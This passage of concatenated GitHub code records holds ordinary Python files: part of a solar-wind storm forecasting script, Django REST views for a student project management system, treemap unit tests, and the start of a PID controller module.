kp=kp_newell.interp_to_time(sw_merged_min['time']),\n aurora=aurora_power.interp_to_time(sw_merged_min['time']),\n 
ec=newell_coupling.interp_to_time(sw_merged_min['time']))\n\n archive_data_path_1m = os.path.join(savepath_archive_txt,'predstorm_v1_realtime_1m_{}.txt'.format(\n datetime.strftime(timestamp, \"%Y-%m-%d\")))\n archive_data_path_1h = archive_data_path_1m.replace('1m', '1h')\n shutil.copyfile(os.path.join(savepath_rt,'predstorm_real.txt'), archive_data_path_1h)\n shutil.copyfile(os.path.join(savepath_rt,'predstorm_real_1m.txt'), archive_data_path_1m)\n\n past_100days = timenow - timedelta(days=100)\n\n # Data for archiving (past 100 days):\n if run_mode == 'normal':\n pickled_forecasts = os.path.join(inputpath, \"past_100days_running_forecasts.p\")\n if not os.path.exists(pickled_forecasts):\n forecasts = sw_merged.data\n forecasts = forecasts[:, forecasts[0] > date2num(timestamp)]\n logger.info(\"Creating new 100-day file for saving forecasts under {}\".format(pickled_forecasts))\n recurr = np.full((1, forecasts.shape[1]), use_recurrence_model) # column defining which input was used\n forecasts = np.vstack((forecasts, recurr))\n else:\n with open(pickled_forecasts, 'rb') as f:\n past_forecasts = pickle.load(f)\n new_forecasts = sw_merged.data\n new_forecasts = new_forecasts[:, new_forecasts[0] > past_forecasts[0][-1]]\n recurr = np.full((1, new_forecasts.shape[1]), use_recurrence_model)\n new_forecasts = np.vstack((new_forecasts, recurr))\n forecasts = np.hstack((past_forecasts, new_forecasts))\n logger.info(\"Last {} value at {}, adding {} new value(s).\".format(pickled_forecasts, num2date(past_forecasts[0][-1]), new_forecasts.shape[1]))\n with open(pickled_forecasts, \"wb\") as f:\n pickle.dump(forecasts, f)\n\n # Standard data:\n filename_save = os.path.join(savepath_archive_txt, 'predstorm_v1_realtime_stereo_a_save_{}.txt'.format(datestr))\n ps.save_to_file(filename_save, wind=sw_merged, dst=dst_pred, kp=kp_newell, aurora=aurora_power, ec=newell_coupling)\n logger.info('Variables saved in TXT form: '+filename_save)\n\n\n #========================== (5) CARRY OUT VALIDATION ====================================\n\n #----------------------------- (4b) CALCULATE FORECAST RESULTS --------------------------\n\n if not use_recurrence_model:\n logger.info(\"\\n\\nSATELLITE POSITION DETAILS\\n--------------------------\\n\"+sta_details)\n\n future_times = np.where(sw_merged['time'] > date2num(timestamp))\n past_times = np.where(sw_merged['time'] < date2num(timestamp))\n\n min_cut = np.max((dst['time'][0], sw_merged['time'][0]))\n max_cut = np.min((dst['time'][-1], sw_merged['time'][-1]))\n dst_cut = dst['dst'][np.logical_and(dst['time'] > min_cut, dst['time'] < max_cut)]\n dst_pred_cut = dst_pred['dst'][np.logical_and(dst_pred['time'] > min_cut, dst_pred['time'] < max_cut)]\n results_str = ''\n\n if len(dst_cut) == len(dst_pred_cut):\n #----------------------------- (4c) GOODNESS METRICS --------------------------\n scores = ps.predict.get_scores(dst_cut, dst_pred_cut, dst['time'][np.logical_and(dst['time'] > min_cut, dst['time'] < max_cut)],\n printtext=verbose)\n results_str += 'SCORING\\n-------\\n'\n results_str += 'MAE of real Dst to Dst forecast:\\t{:.2f} nT\\n'.format(scores['mae'])\n results_str += 'Diff of real Dst to Dst forecast:\\t{:.2f} +/- {:.2f} nT\\n'.format(scores['diff_mean'], scores['diff_std'])\n results_str += 'Correlation of forecast in time:\\t{:.2f}\\n'.format(scores['ppmc'])\n results_str += 'Best correlation of forecast in time:\\t{}\\n'.format(scores['xcorr_max'])\n results_str += 'Best correlation time difference:\\t{} hours\\n'.format(scores['xcorr_offset'])\n 
results_str += '\\n'\n else: # TODO: handle mismatching Dst sizes\n logger.warning(\"Dst (past) sizes are mismatched with {} and {}\".format(len(dst_cut), len(dst_pred_cut)))\n\n #----------------------------- (4d) RESULTS OF DST PREDICTION --------------------------\n results_str += 'PREDSTORM L5 (STEREO-A) DST PREDICTION RESULTS\\n----------------------------------------------\\n'\n\n mindst_time = dst['time'][np.nanargmin(dst['dst'])]\n mindst_predp_time = dst_pred['time'][np.nanargmin(dst_pred['dst'][past_times])]\n results_str += 'Dst minimum:\\n'\n results_str += \"\\tReal: \\t{:.1f} nT\\t at {}\\n\".format(np.nanmin(dst['dst']), str(num2date(mindst_time))[0:16])\n results_str += \"\\tForecast:\\t{:.1f} nT\\t at {}\\n\".format(np.nanmin(dst_pred['dst'][past_times]), str(num2date(mindst_predp_time))[0:16])\n results_str += '\\n'\n\n mindst_predf_time = dst_pred['time'][np.nanargmin(dst_pred['dst'][future_times])]\n results_str += 'Predicted Dst minimum:\\n'\n results_str += \"\\tForecast:\\t{:.1f} nT\\tat {}\\n\".format(np.nanmin(dst_pred['dst'][future_times]), str(num2date(mindst_predf_time))[0:16])\n results_str += '\\n'\n\n for dstlims in [[-50,-100], [-100,-200], [-200,-2000]]:\n results_str += 'Predicted times of moderate storm levels (-50 to -100 nT):\\n'\n storm_times_ind = np.where(np.logical_and(dst_pred['dst'][future_times] < dstlims[0], dst_pred['dst'][future_times] > dstlims[1]))[0]\n if len(storm_times_ind) > 0:\n for i in np.arange(0,len(storm_times_ind),1):\n results_str += '\\t{}\\n'.format(str(num2date(sw_merged['time'][future_times][storm_times_ind][i]))[0:16])\n else:\n results_str += '\\tNone\\n'\n results_str += '\\n'\n\n #----------------------------- (4e) DATA ON SOLAR WIND VALUES --------------------------\n results_str += 'SOLAR WIND PARAMETERS\\n---------------------\\n'\n\n for var, unit in zip(['speed', 'btot'], ['km/s', 'nT ']):\n maxvar_time = sw_merged['time'][past_times[0][0]+np.nanargmax(sw_merged[var][past_times])]\n results_str += 'Maximum {}:\\n'.format(var)\n results_str += \"\\tPast: \\t{:.1f} {} \\t at {}\\n\".format(np.nanmax(sw_merged[var][past_times]), unit, str(num2date(maxvar_time+1/(24*60)))[0:16])\n maxvar_time = sw_merged['time'][future_times[0][0]+np.nanargmax(sw_merged[var][future_times])]\n results_str += \"\\tForecast:\\t{:.1f} {} \\t at {}\\n\".format(np.nanmax(sw_merged[var][future_times]), unit, str(num2date(maxvar_time+1/(24*60)))[0:16])\n results_str += '\\n'\n\n var = 'bz'\n minvar_time = sw_merged['time'][past_times[0][0]+np.nanargmin(sw_merged[var][past_times])]\n results_str += 'Minimum {}:\\n'.format(var)\n results_str += \"\\tPast: \\t{:.1f} {} \\t at {}\\n\".format(np.nanmin(sw_merged[var][past_times]), unit, str(num2date(minvar_time+1/(24*60)))[0:16])\n minvar_time = sw_merged['time'][future_times[0][0]+np.nanargmin(sw_merged[var][future_times])]\n results_str += \"\\tForecast:\\t{:.1f} {} \\t at {}\\n\".format(np.nanmin(sw_merged[var][future_times]), unit, str(num2date(minvar_time+1/(24*60)))[0:16])\n results_str += '\\n'\n\n logger.info(\"Final results:\\n\\n\"+results_str)\n\n #------------------------------- (4f) PLOT SOME BASIC STATS -------------------------\n try:\n fig, (axes) = plt.subplots(1, 3, figsize=(15, 5))\n # Plot of correlation between values\n axes[0].plot(dst_pred_cut, dst_cut, 'x')\n axes[0].set_title(\"Real vs. 
forecast Dst\")\n axes[0].set_xlabel(\"Forecast Dst [nT]\")\n axes[0].set_ylabel(\"Kyoto Dst [nT]\")\n\n # Histogram of forecast\n n, bins, patches = axes[1].hist(dst_pred['dst'], 20)\n axes[1].set_title(\"Histogram of forecast Dst\")\n axes[1].set_xlim([30, -200])\n axes[1].set_xlabel(\"Forecast Dst [nT]\")\n\n plt.suptitle(\"\")\n plt.savefig(os.path.join(savepath_rt, 'predstorm_stats.png'))\n except:\n pass\n\n\ndef validation(look_back=40):\n \"\"\"Carries out validation for past month of data.\"\"\"\n\n import seaborn as sns\n sns.set_style('darkgrid')\n\n now = datetime.utcnow()\n\n lw = pltcfg.lw\n\n pickled_forecasts = \"data/past_100days_running_forecasts.p\" # correct without leo later\n if not os.path.exists(pickled_forecasts):\n raise Exception(\"Cannot carry out validation without past saved values! \\\n Make sure the file {} is being written.\".format(pickled_forecasts))\n\n with open(pickled_forecasts, 'rb') as f:\n past_forecasts = pickle.load(f)\n\n sw_validation = ps.SatData({'time': past_forecasts[0]})\n sw_validation.data = past_forecasts[:-1]\n sw_validation.vars = ['bz', 'btot', 'speed', 'density', 'dst', 'aurora', 'kp', 'ec', 'ae']\n sw_validation['ae'] = past_forecasts[-1]\n sw_validation = sw_validation.make_hourly_data()\n sw_validation = sw_validation.cut(starttime=now-timedelta(days=look_back), endtime=now)\n\n # Read 27-day recurrence data:\n pers27_path = \"data/rtsw_hour_last100days.h5\"\n kyoto_dst = ps.get_rtsw_archive_data(pers27_path, add_dst=True)\n kyoto_dst = kyoto_dst.interp_to_time(sw_validation['time'])\n pers27_path_min = \"data/rtsw_min_last100days.h5\"\n sw_recurrence = ps.get_rtsw_archive_data(pers27_path_min)\n sw_recurrence = sw_recurrence.make_hourly_data()\n sw_recurrence['time'] += 27. # correct by one Carrington rotation\n sw_recurrence.h['DataSource'] += ' t+27days'\n sw_recurrence = sw_recurrence.interp_to_time(sw_validation['time'])\n\n pltvars = ['bz', 'btot', 'speed', 'density', 'dst']\n ylabels = {'bz': '$B_z$ [nT]', 'btot': '$B_{tot}$ [nT]', 'speed': 'Solar wind speed\\n[km/s]',\n 'density': 'Density [ccm-3]', 'dst': '$Dst$ [nT]'}\n l5_true = sw_validation['ae'] != 1.\n l5_inds = np.where(l5_true)\n fig, axes = plt.subplots(len(pltvars)+1, sharex=True, figsize=pltcfg.figsize)\n\n for i_var, pltvar in enumerate(pltvars):\n if pltvar != 'dst':\n axes[i_var].plot_date(sw_recurrence['time'], sw_recurrence[pltvar], \n 'k-', lw=lw, alpha=0.2, label=\"27-day rec (not used)\")\n elif pltvar == 'dst':\n axes[i_var].plot_date(kyoto_dst['time'], kyoto_dst['dst'], '--', c='green', lw=lw, label=\"Kyoto Dst\")\n sta_only = np.full((len(sw_validation)), np.nan)\n sta_only[l5_true] = sw_validation[pltvar][l5_true]\n rec_only = np.full((len(sw_validation)), np.nan)\n rec_only[~l5_true] = sw_validation[pltvar][~l5_true]\n axes[i_var].plot_date(sw_validation['time'], rec_only, 'k-', lw=lw, label=\"27-day rec ({:.0f}%)\".format(100.*(len(sw_validation)-len(l5_inds[0]))/len(sw_validation)))\n axes[i_var].plot_date(sw_validation['time'], sta_only, 'r-', lw=lw, label=\"STEREO-A ({:.0f}%)\".format(100.*len(l5_inds[0])/len(sw_validation)))\n axes[i_var].set_ylabel(ylabels[pltvar])\n axes[-1].plot_date(sw_validation['time'], sw_validation['dst']-kyoto_dst['dst'], 'k-', lw=lw)\n axes[-1].set_ylabel(\"$\\Delta Dst$ [nT]\")\n\n # Formatting:\n axes[0].set_title(\"Validation plot for solar wind forecasting between {} and {}\".format((now - timedelta(days=look_back)).strftime('%Y-%m-%d'), now.strftime('%Y-%m-%d')))\n axes[-1].set_xlim([now - 
timedelta(days=look_back), now])\n axes[0].legend(loc='upper left', ncol=3)\n axes[-2].legend(loc='upper left', ncol=3)\n\n plt.subplots_adjust(hspace=0.1)\n plt.savefig('predstorm_validation.png')\n\n\n#========================================================================================\n#--------------------------------- RUN SCRIPT -------------------------------------------\n#========================================================================================\n\nif __name__ == '__main__':\n\n run_mode = 'normal'\n verbose, use3DCORE, force_stereoa = True, False, False\n run_validation = False\n for opt, arg in myopts:\n if opt == \"--server\":\n server = True\n if opt == '-v' or opt == \"--verbose\":\n if arg == 'False':\n verbose = False\n elif opt == '--historic':\n run_mode = 'historic'\n timestamp = datetime.strptime(arg, \"%Y-%m-%dT%H:%M\")\n timestamp = timestamp.replace(tzinfo=None)\n elif opt == '--use3DCORE':\n use3DCORE = True\n path_3DCORE = arg\n elif opt == '--force-stereoa':\n force_stereoa = True\n elif opt == '--validation':\n run_validation = True\n elif opt == '-h' or opt == '--help':\n print(\"\")\n print(\"-----------------------------------------------------------------\")\n print(\"DESCRIPTION:\")\n print(\"This PREDSTORM L5 script uses time-shifted data from a spacecraft\")\n print(\"east of the Sun-Earth line, currently STEREO-A, to provide real-\")\n print(\"time solar wind and magnetic storm forecasting.\")\n print(\"-------------------------------------\")\n print(\"RUN OPTIONS:\")\n print(\"--server : Run script in server mode.\")\n print(\" python predstorm_l5.py --server\")\n print(\"--historic : Run script with a historic data set.\")\n print(\" python predstorm_l5.py --historic='2017-09-07T23:00'\")\n print(\"--use3DCORE : Run script with 3DCORE flux rope input.\")\n print(\" python predstorm_l5.py --historic='2017-09-07T23:00' --use3DCORE='dst.pickle'\")\n print(\"--validation : Run script in validation mode.\")\n print(\" python predstorm_l5.py --validation\")\n print(\"--force-stereoa : Force STEREO-A usage (if the data exists), even if the data is bad.\")\n print(\" python predstorm_l5.py --force-stereoa\")\n print(\"GENERAL OPTIONS:\")\n print(\"-h/--help : print this help data\")\n print(\"-v/--verbose : print logging output to shell for debugging\")\n print(\"-------------------------------------\")\n print(\"EXAMPLE USAGE:\")\n print(\" Most basic:\")\n print(\" python predstorm_l5.py\")\n print(\" --> See results/ folder for output.\")\n print(\"-----------------------------------------------------------------\")\n print(\"\")\n sys.exit()\n\n # INITIATE LOGGING:\n logger = ps.init_logging(verbose=verbose)\n\n # Make sure all paths are available:\n # ----------------------------------\n inputpath = config['RealTimePred']['InputDataPath']\n if not os.path.exists(inputpath):\n os.mkdir(inputpath)\n\n savepath_rt = config['RealTimePred']['RealtimePath']\n if not os.path.exists(savepath_rt):\n os.mkdir(savepath_rt)\n\n savepath_archive = config['RealTimePred']['ArchivePath']\n if not os.path.exists(os.path.join(savepath_archive, 'plots')):\n os.mkdir(os.path.join(savepath_archive, 'plots'))\n if not os.path.exists(os.path.join(savepath_archive, 'text')):\n os.mkdir(os.path.join(savepath_archive, 'text'))\n\n\n # Closes all plots\n plt.close('all')\n\n # Run validation:\n if run_validation:\n validation()\n sys.exit()\n\n main()\n\n print(\"------ This run completed at {}! 
------\\n\".format(datetime.utcnow()))\n\n","repo_name":"helioforecast/Predstorm","sub_path":"run_predstorm_l5.py","file_name":"run_predstorm_l5.py","file_ext":"py","file_size_in_byte":34296,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"33045590780","text":"from ..models import Model, Alien\nfrom ..fields import Field\nimport pytest\n\ndef test_Model():\n with pytest.raises(NotImplementedError):\n tmp=Model()\n\ndef test_Alien():\n tmp=Alien()\n assert isinstance(tmp, Alien)==True\n assert type(tmp.get_list_fields())==list\n for field in tmp.fields:\n assert isinstance(field, Field)\n for field in tmp.fields:\n tmp.set(field.field_id, \"test value\")\n assert tmp.get(field.field_id)==\"test value\"\n","repo_name":"gorbinphilip/PyRegistrar","sub_path":"pyregistrar/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39855597560","text":"from django.utils import timezone\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom fyp_management.permission import IsFYPPanel, IsStudent, IsSupervisor\nfrom core.models import User, fyppanel, project, supervisor, teamMember, milestone\nfrom project.serializers import projectlistSerializer, projectSerializer\nfrom teamMember.serializers import teamMemberSerializer\nfrom milestone.models import Milestonemarks\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom google.auth import exceptions\n\n# # Create your views here.\nclass projectAPIView(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def post(self, request):\n department = request.user.department\n dep_id = department.id\n try:\n \n json_title = request.data.get(\"title\")\n json_year = request.data.get(\"year\")\n json_batch = request.data.get(\"batch\")\n json_description = request.data.get(\"description\")\n json_domain = request.data.get(\"domain\")\n json_no_of_group_members = int(request.data.get(\"no_of_group_members\"))\n json_supervisor = int(request.data.get(\"supervisor\"))\n\n # Creating the dictionary\n data = {\n 'title': json_title,\n 'year': json_year,\n 'batch': json_batch,\n 'description': json_description,\n 'domain': json_domain,\n 'no_of_group_members': json_no_of_group_members,\n 'supervisor': json_supervisor,\n 'department': dep_id\n }\n serialize = projectSerializer(data=data)\n if serialize.is_valid():\n serialize.save()\n sup = supervisor.objects.get(id=json_supervisor, deleted_at=None)\n email_to = sup.user.email\n subject = f'WELCOME IN {json_title} PROJECT'\n email_from = request.user\n message = f\"You are added in {json_title} PROJECT By FYP Co-ordinator of {request.user.department} department of {request.user.uni}\\nYou are required to start the project by adding {json_no_of_group_members} Students (team Members) init.\\nPlease find below mentioned link to access the system.\\n{'https://pmbotics.netlify.app/'}\\nUse your login credentials which is given to you by registration email.\\nBest Regards\\nFYP Co-ordinator Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n\n return Response(\n {\n 
\"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n ) \n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\":{},\n \"exception\": \"Validation Error\",\n }\n )\n except Exception as e:\n return Response(\n {\n \"status\": 400,\n \"message\": \"Bad Request\",\n \"body\": {},\n \"exception\": str(e)\n }\n )\n\n\nclass projectlistAPI(APIView):\n permission_classes = [IsAuthenticated & (IsSupervisor | IsStudent)]\n def get(self, request):\n try:\n if request.user.role == User.SUPERVISOR:\n sup = supervisor.objects.get(user=request.user, deleted_at=None)\n pro_queryset = project.objects.filter(supervisor=sup, deleted_at=None)\n data = []\n for pro in pro_queryset:\n team_member = teamMember.objects.filter(project_id=pro.id, deleted_at=None)\n current_no_of_group_members = len(team_member)\n serialize = projectlistSerializer(pro)\n project_data = serialize.data \n data_dict = {\n 'current_no_of_group_members': current_no_of_group_members,\n **project_data\n }\n data.append(data_dict)\n return Response( \n {\n \"data\": data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n elif request.user.role == User.STUDENT:\n tm = teamMember.objects.get(user=request.user, deleted_at=None)\n pro = tm.project\n serialize = projectlistSerializer(pro) \n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n\nclass updateprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def patch(self, request):\n try:\n try:\n sup = project.objects.get(id=request.data.get(\"id\"), deleted_at=None)\n team_member = teamMember.objects.filter(project__id=request.data.get(\"id\"), deleted_at=None)\n if len(team_member) > request.data.get(\"no_of_group_members\"):\n return Response( \n {\n \"data\": [],\n \"status\": 200,\n \"message\": \"You are not allowed to decrease number of group members becuase there are already more group members than your specified limit, In order to decrease group members. 
ask supervisor to remove some members from project\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n serialize = projectSerializer(sup,data=request.data)\n if serialize.is_valid():\n serialize.save()\n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\": {},\n \"exception\": \"some exception\" \n }\n )\n except:\n sup = project.objects.get(id=request.data.get(\"id\"), deleted_at=None)\n serialize = projectSerializer(sup,data=request.data)\n if serialize.is_valid():\n serialize.save()\n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\": {},\n \"exception\": \"some exception\" \n }\n ) \n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n\nclass deleteprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def delete(self, request, pk):\n try:\n my_object = project.objects.get(pk=pk, deleted_at=None)\n my_object.deleted_at = timezone.now()\n my_object.save()\n except project.DoesNotExist:\n return Response(\n {\n \"status\": 404,\n \"message\": \"Not Found\",\n \"body\": {},\n \"exception\": None \n }\n )\n return Response(\n {\n \"status\": 200,\n \"message\": \"Successfuly deleted\",\n \"body\": {},\n \"exception\": None \n }\n )\n\nclass addteammemberAPI(APIView):\n permission_classes = [IsAuthenticated & IsSupervisor]\n def post(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"project_id\"), deleted_at=None)\n tm = teamMember.objects.get(id=request.data.get(\"teammember_id\"), deleted_at=None)\n tm.project = pro\n tm.save()\n email_to = tm.user.email\n subject = f'WELCOME IN {pro.title} PROJECT'\n email_from = request.user\n message = f\"You are added in {pro.title} PROJECT By FYP Supervisor of {request.user.department} department of {request.user.uni}\\nPlease find below mentioned link to access the system.\\n{'https://pmbotics.netlify.app/'}\\nUse your login credentials which is given to you by registration email.\\nBest Regards\\nFYP Supervisor Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n\n return Response(\n {\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n\n def patch(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"project_id\"), deleted_at=None)\n tm = teamMember.objects.get(id=request.data.get(\"teammember_id\"), deleted_at=None)\n if tm.project == None:\n return Response(\n {\n \"status\": 404,\n \"message\": \"Not Found\",\n \"body\": {},\n \"exception\": None \n }\n )\n else: \n tm.project = None\n tm.save()\n email_to = tm.user.email\n subject = f'REMOVE FROM {pro.title} PROJECT'\n email_from = request.user\n message = f\"You are removed from {pro.title} PROJECT By FYP Supervisor of 
{request.user.department} department of {request.user.uni}.\\nPlease contact FYP Co-ordinator or wait for new project onboarding\\nBest Regards\\nFYP Supervisor Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n return Response(\n {\n \"status\": 200,\n \"message\": \"Successfuly deleted\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n \nclass allprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def get(self, request):\n try:\n dep_id = request.user.department\n my_objects = project.objects.filter(department=dep_id, deleted_at=None)\n serializer = projectlistSerializer(my_objects, many=True)\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": serializer.data,\n \"exception\": None\n })\n except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n\nclass changesupervisorAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def patch(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"pro_id\"), deleted_at=None)\n sup = supervisor.objects.get(id=request.data.get(\"sup_id\"), deleted_at=None)\n pro.supervisor = sup\n pro.save()\n return Response( \n {\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n \n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"body\": {},\n \"exception\": str(e) \n }\n )\n\nclass studentprojectwiseAPI(APIView):\n permission_classes = [IsAuthenticated & (IsSupervisor | IsStudent | IsFYPPanel)]\n def get(self, request):\n try:\n tm = teamMember.objects.filter(project=project.objects.get(id=request.GET.get(\"pro_id\")), deleted_at=None)\n serialize = teamMemberSerializer(tm, many=True)\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": serialize.data,\n \"exception\": None\n })\n except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n\nclass markasCompletedApi(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n\n def patch(self, request):\n try:\n pro=project.objects.get(id=request.data.get(\"pro_id\"), deleted_at=None) \n if request.data.get(\"status\") == \"completed\":\n milestone_marks = Milestonemarks.objects.filter(project=pro, deleted_at=None)\n milestone_marks_dict = {}\n for milestone_mark in milestone_marks:\n if milestone_mark.milestone_id not in milestone_marks_dict:\n milestone_marks_dict[milestone_mark.milestone_id] = []\n milestone_marks_dict[milestone_mark.milestone_id].append(milestone_mark.marks)\n averages = {key: sum(values) / len(values) for key, values in milestone_marks_dict.items()}\n grad = 0\n for i in averages:\n grad += averages[i]\n pro.status = request.data.get(\"status\")\n pro.grade = grad\n pro.save()\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None\n })\n else:\n pro.status = request.data.get(\"status\")\n pro.grade = 0\n pro.save()\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None\n })\n 
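The markasCompletedApi view above groups Milestonemarks rows by milestone id, averages each group, and sums the averages into the project grade. The same aggregation reads more directly with collections.defaultdict; a standalone sketch over plain (milestone_id, marks) tuples standing in for the queryset (the sample marks are made up):

from collections import defaultdict

rows = [(1, 80), (1, 90), (2, 70), (2, 75), (3, 100)]

by_milestone = defaultdict(list)
for milestone_id, marks in rows:
    by_milestone[milestone_id].append(marks)

# average per milestone, then sum the averages into the final grade
averages = {mid: sum(v) / len(v) for mid, v in by_milestone.items()}
grade = sum(averages.values())
print(averages)  # {1: 85.0, 2: 72.5, 3: 100.0}
print(grade)     # 257.5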
except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n","repo_name":"usama-ali74/pmboticsbackend","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18336364209","text":"import unittest\nfrom matplotlib.figure import Figure\nfrom chart.treemap import Treemap\n\nclass TestTreemap(unittest.TestCase):\n def setUp(self):\n data = {\n \"Documents\": (None, None),\n \"School\": (None, \"Documents\"),\n \"Assignment\": (100, \"School\"),\n \"Personal\": (None, \"Documents\"),\n \"CV\": (200, \"Personal\")\n }\n self.treemap = Treemap(data)\n\n def test_get_node_value(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"node1\", 23)), 23, \"Should equal 23\")\n\n def test_get_figure(self):\n self.assertTrue(isinstance(self.treemap.get_figure(), Figure))\n\n def test_convert_data(self):\n expected_data = (\n \"Documents\", \n (\n (\n \"School\",\n (\n (\"Assignment\",\n 100\n ),\n )\n ),\n (\n \"Personal\",\n (\n (\n \"CV\",\n 200\n ),\n )\n )\n )\n )\n converted_data = self.treemap._Treemap__convert_data()\n self.assertEqual(converted_data, expected_data)\n\n def test_calculate_node_value_1(self):\n key_list = [\"Documents\", \"School\", \"Assignment\", \"Personal\", \"CV\"]\n return_value = self.treemap._Treemap__calculate_node_value(\"CV\", key_list)\n self.assertEqual(return_value, 200)\n \n def test_calculate_node_value_2(self):\n key_list = [\"Documents\", \"School\", \"Assignment\", \"Personal\", \"CV\"]\n return_value = self.treemap._Treemap__calculate_node_value(\"School\", key_list)\n self.assertEqual(return_value, ((\"Assignment\", 100),))\n\n def test_get_node_name(self):\n self.assertEqual(self.treemap._Treemap__get_node_name((\"Cecil\", 20)), \"Cecil\")\n\n def test_get_node_value_1(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"Cecil\", 20, None)), 20)\n\n def test_get_node_value_2(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"Cecil\", ((\"A\", 3), (\"B\", 5)), 8)), 8)\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"pycharts/pycharts","sub_path":"tests/test_treemap.py","file_name":"test_treemap.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32513406565","text":"#! 
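The treemap tests in the record above reach private methods through names like _Treemap__get_node_value. That works because CPython rewrites any __name attribute used inside a class body to _ClassName__name (name mangling); a minimal demonstration:

class Treemap:  # reduced stand-in for the class under test
    def __get_node_value(self, node):
        return node[1]

t = Treemap()
print(t._Treemap__get_node_value(("node1", 23)))  # 23: the mangled name works
try:
    t.__get_node_value(("node1", 23))  # the unmangled name fails outside the class
except AttributeError as exc:
    print(exc)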
python 3\n\n\n\"\"\"pid_controller.py\n \n    Requires:\n        kp - proportional gain (default is None)\n            -> If given, the proportional controller is used.\n        ki - integral gain (default is None)\n            -> If given, the integral controller is used.\n        kd - derivative gain (default is None)\n            -> If given, the derivative controller is used.\n        max_input - maximum desired input if any (default is None)\n        min_input - minimum desired input if any (default is None)\n        sse_ratio - steady-state error ratio (default is None)\n            -> Set this if you want to use the integral controller only for\n                eliminating steady-state error (0.1 < sse_ratio < 0.3 recommended).\n        threshold_i_ctrlr - threshold for the integral controller (default is None)\n            -> Each time it is detected that it is in the range of steady-state error,\n                self._i_counter is increased by 1, and when it exceeds threshold_i_ctrlr,\n                steady-state error is detected, and the integral controller is activated.\n\n    Returns:\n        input: float\n    \n    Notes:\n        If you put a limitation on the integral controller, you MUST give BOTH sse_ratio AND threshold_i_ctrlr.\n\"\"\"\n\n\nfrom time import time\nfrom typing import Optional\n\nclass PIDController:\n\n    def __init__(self,\n                 kp: Optional[float] = None,\n                 ki: Optional[float] = None,\n                 kd: Optional[float] = None,\n                 max_input: Optional[float] = None,\n                 min_input: Optional[float] = None,\n         